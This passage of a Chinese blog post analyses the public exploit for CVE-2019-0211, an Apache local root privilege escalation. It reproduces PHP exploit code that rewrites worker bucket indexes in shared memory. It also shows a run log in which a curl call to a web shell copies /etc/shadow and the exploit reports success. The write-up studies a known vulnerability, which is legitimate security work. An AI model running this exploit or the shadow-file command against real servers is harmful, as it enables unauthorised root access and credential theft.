class="line">			$p += <span class="hljs-number">0x24</span></span><br><span class="line">		)</span><br><span class="line">		&#123;</span><br><span class="line">			$l = $p - $address;</span><br><span class="line">			$current_pid = str2ptr(<span class="hljs-keyword">$this</span>-&gt;abc, $l, <span class="hljs-number">4</span>);</span><br><span class="line">			o(<span class="hljs-string">'Got PID: '</span> . $current_pid);</span><br><span class="line">			<span class="hljs-comment"># The PID matches one of the workers</span></span><br><span class="line">			<span class="hljs-keyword">if</span>(in_array($current_pid, $workers_pids))</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="hljs-keyword">unset</span>($workers_pids[$current_pid]);</span><br><span class="line">				o(<span class="hljs-string">'  PID matches'</span>);</span><br></pre></td></tr></table></figure>
<p>将所有worker<code>process_score.bucket</code>都进行修改，而非修改其中一个：<br><figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-comment"># Update bucket address</span></span><br><span class="line">$s_bucket_index = pack(<span class="hljs-string">'l'</span>, $bucket_index);</span><br><span class="line"><span class="hljs-keyword">$this</span>-&gt;abc[$l + <span class="hljs-number">0x20</span>] = $s_bucket_index[<span class="hljs-number">0</span>];</span><br><span class="line"><span class="hljs-keyword">$this</span>-&gt;abc[$l + <span class="hljs-number">0x21</span>] = $s_bucket_index[<span class="hljs-number">1</span>];</span><br><span class="line"><span class="hljs-keyword">$this</span>-&gt;abc[$l + <span class="hljs-number">0x22</span>] = $s_bucket_index[<span class="hljs-number">2</span>];</span><br><span class="line"><span class="hljs-keyword">$this</span>-&gt;abc[$l + <span class="hljs-number">0x23</span>] = $s_bucket_index[<span class="hljs-number">3</span>];</span><br><span class="line">o(<span class="hljs-string">'  Changed bucket value to '</span> . $bucket_index);</span><br><span class="line">$min = $spray_min - $size_prefork_child_bucket * $bucket_index;</span><br><span class="line">$max = $spray_max - $size_prefork_child_bucket * $bucket_index;</span><br><span class="line">o(<span class="hljs-string">'  Ranges: 0x'</span> . dechex($min) . <span class="hljs-string">' - 0x'</span> . dechex($max));</span><br><span class="line"><span class="hljs-comment"># This bucket range is covered, go to the next one</span></span><br><span class="line">$bucket_index += $spray_nb_buckets;</span><br></pre></td></tr></table></figure></p>
<p>到这里，整个漏洞利用过程就结束了，可以等到6:25AM查看利用是否利用成功，也可以手动执行<code>apachectl graceful</code>验证。</p>
<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-keyword">if</span>(count($workers_pids) &gt; <span class="hljs-number">0</span>)</span><br><span class="line">&#123;</span><br><span class="line">	o(</span><br><span class="line">		<span class="hljs-string">'Unable to find PIDs '</span> .</span><br><span class="line">		implode(<span class="hljs-string">', '</span>, $workers_pids) .</span><br><span class="line">		<span class="hljs-string">' in SHM, exiting.'</span></span><br><span class="line">	);</span><br><span class="line">	<span class="hljs-keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">o(<span class="hljs-string">''</span>);</span><br><span class="line">o(<span class="hljs-string">'EXPLOIT SUCCESSFUL.'</span>);</span><br><span class="line">o(<span class="hljs-string">'Await 6:25AM.'</span>);</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;</span><br></pre></td></tr></table></figure>
<figure class="highlight bash hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line">➜ curl http://192.168.116.133/carpediem.php\?cmd\=cp+/etc/shadow+/tmp/</span><br><span class="line">CARPE (DIEM) ~ CVE-2019-0211</span><br><span class="line"></span><br><span class="line">PID: 887</span><br><span class="line">Fetching addresses</span><br><span class="line">  zend_object_std_dtor: 0x7fc38f605700</span><br><span class="line">  system: 0x7fc3936bc480</span><br><span class="line">  libaprX: 0x7fc393c39000-0x0x7fc393c6b000</span><br><span class="line">  libaprR: 0x7fc393e6b000-0x0x7fc393e6c000</span><br><span class="line">  shm: 0x7fc394456000-0x0x7fc39446a000</span><br><span class="line">  apache: 0x7fc39446a000-0x0x7fc39452a000</span><br><span class="line"></span><br><span class="line">Obtaining apache workers PIDs</span><br><span class="line">  Found apache worker: 887</span><br><span class="line">  Found apache worker: 888</span><br><span class="line">  Found apache worker: 889</span><br><span class="line">  Found apache worker: 890</span><br><span class="line">  Found apache worker: 891</span><br><span class="line">Got 5 PIDs.</span><br><span class="line"></span><br><span class="line">Triggering UAF</span><br><span class="line">  Creating room and filling empty spaces</span><br><span class="line"></span><br><span class="line">  Allocating <span class="hljs-variable">$abc</span> and <span class="hljs-variable">$p</span></span><br><span class="line"></span><br><span class="line">  Unsetting both variables and setting <span class="hljs-variable">$protector</span></span><br><span class="line">  Creating DateInterval object</span><br><span class="line">UAF successful.</span><br><span class="line"></span><br><span class="line">Address of <span class="hljs-variable">$abc</span>: 0x7fc38aaa34e8</span><br><span class="line"></span><br><span class="line">Looking <span class="hljs-keyword">for</span> all_buckets <span class="hljs-keyword">in</span> memory</span><br><span class="line">  [&amp;mutex]: 0x7fc3944cab70</span><br><span class="line">    [mutex]: 0x7fc3944cacc0</span><br><span class="line">      [meth]: 0x7fc393e6bca0</span><br><span class="line">        [*]: 0x7fc393c53ce0</span><br><span class="line">        [*]: 0x7fc393c541b0</span><br><span class="line">        [*]: 0x7fc393c53e90</span><br><span class="line">        [*]: 0x7fc393c54210</span><br><span class="line">        [*]: 0x7fc393c53bf0</span><br><span class="line">        [*]: 0x7fc393c53960</span><br><span class="line">        [*]: 0x7fc393c6228c</span><br><span class="line">all_buckets = 0x7fc3944cab60</span><br><span class="line"></span><br><span class="line">Computing potential bucket indexes and addresses</span><br><span class="line">[bucket_index_middle]: -17858</span><br><span class="line">Placing payload at address 0x7fc39445a148</span><br><span class="line">Spraying pointer</span><br><span class="line">  Address: 0x7fc39445a218</span><br><span class="line">  From: 0x7fc39445a250</span><br><span class="line">  To: 0x7fc39446a000</span><br><span class="line">  Size: 0xfdb0</span><br><span class="line">  Covered: 0x4f470</span><br><span class="line">  Apache: 0xc0000</span><br><span class="line"></span><br><span class="line">Iterating <span class="hljs-keyword">in</span> SHM to find PIDs...</span><br><span class="line">[spray_nb_bucket]: 2706</span><br><span class="line">[total_nb_buckets]: 13530</span><br><span class="line">[bucket_index]: -24623</span><br><span class="line">Got PID: 887</span><br><span class="line">  PID matches</span><br><span class="line">  Changed bucket value to -24623</span><br><span class="line">  Ranges: 0x7fc3944ea6b8 - 0x7fc3944fa468</span><br><span class="line">Got PID: 888</span><br><span class="line">  PID matches</span><br><span class="line">  Changed bucket value to -21917</span><br><span class="line">  Ranges: 0x7fc3944da908 - 0x7fc3944ea6b8</span><br><span class="line">Got PID: 889</span><br><span class="line">  PID matches</span><br><span class="line">  Changed bucket value to -19211</span><br><span class="line">  Ranges: 0x7fc3944cab58 - 0x7fc3944da908</span><br><span class="line">Got PID: 890</span><br><span class="line">  PID matches</span><br><span class="line">  Changed bucket value to -16505</span><br><span class="line">  Ranges: 0x7fc3944bada8 - 0x7fc3944cab58</span><br><span class="line">Got PID: 891</span><br><span class="line">  PID matches</span><br><span class="line">  Changed bucket value to -13799</span><br><span class="line">  Ranges: 0x7fc3944aaff8 - 0x7fc3944bada8</span><br><span class="line"></span><br><span class="line">EXPLOIT SUCCESSFUL.</span><br><span class="line">Await 6:25AM.</span><br></pre></td></tr></table></figure>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><p>[1] <a href="https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html" target="_blank" rel="noopener">CVE-2019-0211 Apache Root Privilege Escalation</a><br>[2] <a href="https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache" target="_blank" rel="noopener">exploit</a><br>[3] <a href="https://www.kancloud.cn/nickbai/php7" target="_blank" rel="noopener">PHP7内核剖析</a></p>

        </div>
        <!-- 文章结尾添加版权声明 从这里开始 -->
        
        <ul class="post-copyright">
        <li><strong>本文标题：</strong><a href="https://jontsang.github.io/post/aab8343b.html">CVE-2019-0211——Apache HTTP组件提权漏洞利</a></li>
        <li><strong>本文作者：</strong><a href="https://jontsang.github.io">Jon Tsang</a></li>
        <!-- <li><strong>本文链接：</strong><a href="https://jontsang.github.io/post/aab8343b.html">https://jontsang.github.io/post/aab8343b.html</a></li> -->
        <li><strong>发布时间：</strong>2019-05-06</li>
        <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
        </ul>
        
        <!-- 文章结尾添加版权声明 到这里结束 -->
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/Apache/">Apache</a>, <a class="has-link-grey -link" href="/tags/Binary/">Binary</a>, <a class="has-link-grey -link" href="/tags/CVE/">CVE</a>, <a class="has-link-grey -link" href="/tags/Heap-Spray/">Heap Spray</a>, <a class="has-link-grey -link" href="/tags/PHP/">PHP</a>, <a class="has-link-grey -link" href="/tags/UAF/">UAF</a>, <a class="has-link-grey -link" href="/tags/提权/">提权</a>, <a class="has-link-grey -link" href="/tags/漏洞/">漏洞</a>
                </div>
            </div>
        </div>
        
        
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="https://raw.githubusercontent.com/JonTsang/Figurebed/master/img/20190822175230.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/post/15753.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">图片隐写信息快速检测工具——zsteg</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/post/16717156.html">
                <span class="level-item">AFL漏洞挖掘技术漫谈：Fuzz结果分析和代码覆盖率</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread" class="content"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: true,
        verify: false,
        app_id: '2oTcdkk2ubE6P9DwKwwTTlDK-gzGzoHsz',
        app_key: 'z1TMyiu5W0zvLI3qKElhM6uU',
        placeholder: '不用注册也可以评论哟~支持Markdown~'
    });
</script>

    </div>
</div>
</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        
<div class="card widget" id="toc">
    <div class="card-content">
        <div class="menu">
            <h3 class="menu-label">
                目录
            </h3>
            <ul class="menu-list"><li>
        <a class="is-flex" href="#漏洞成因">
        <span class="has-mr-6">1</span>
        <span>漏洞成因</span>
        </a></li><li>
        <a class="is-flex" href="#漏洞利用">
        <span class="has-mr-6">2</span>
        <span>漏洞利用</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#exp概述">
        <span class="has-mr-6">2.1</span>
        <span>exp概述</span>
        </a></li><li>
        <a class="is-flex" href="#利用PHP的UAF获取读写SHM的权限">
        <span class="has-mr-6">2.2</span>
        <span>利用PHP的UAF获取读写SHM的权限</span>
        </a><ul class="menu-list"><li>
        <a class="is-flex" href="#填充空闲内存块">
        <span class="has-mr-6">2.2.1</span>
        <span>填充空闲内存块</span>
        </a></li><li>
        <a class="is-flex" href="#创建保护内存块">
        <span class="has-mr-6">2.2.2</span>
        <span>创建保护内存块</span>
        </a></li><li>
        <a class="is-flex" href="#分配UAF的字符串">
        <span class="has-mr-6">2.2.3</span>
        <span>分配UAF的字符串</span>
        </a></li><li>
        <a class="is-flex" href="#触发UAF并验证">
        <span class="has-mr-6">2.2.4</span>
        <span>触发UAF并验证</span>
        </a></li><li>
        <a class="is-flex" href="#控制并修改UAF的结构">
        <span class="has-mr-6">2.2.5</span>
        <span>控制并修改UAF的结构</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#在内存中定位all-buckets">
        <span class="has-mr-6">2.3</span>
        <span>在内存中定位all_buckets</span>
        </a></li><li>
        <a class="is-flex" href="#计算索引buckets">
        <span class="has-mr-6">2.4</span>
        <span>计算索引buckets</span>
        </a></li><li>
        <a class="is-flex" href="#设置payload并喷射SHM">
        <span class="has-mr-6">2.5</span>
        <span>设置payload并喷射SHM</span>
        </a></li><li>
        <a class="is-flex" href="#进一步提高成功率">
        <span class="has-mr-6">2.6</span>
        <span>进一步提高成功率</span>
        </a></li></ul></li><li>
        <a class="is-flex" href="#参考资料">
        <span class="has-mr-6">3</span>
        <span>参考资料</span>
        </a></li></ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.png" alt="CVE-2019-0211——Apache HTTP组件提权漏洞利" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2019 Jon Tsang&nbsp;
                <!--Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>-->
                
                </p>
            </div>
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus">
                        
                        <i class="fab fa-github"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>

<script>
var IcarusThemeSettings = {
    article: {
        highlight: {
            clipboard: true,
            fold: 'unfolded'
        }
    }
};
</script>


    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>